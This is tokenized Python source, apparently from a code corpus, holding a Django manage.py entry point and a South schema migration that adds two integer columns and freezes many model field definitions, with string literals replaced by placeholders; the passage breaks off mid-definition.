<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> from south . utils import datetime_utils as datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) , <EOL> keep_default = False ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1.0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1.0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:time>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 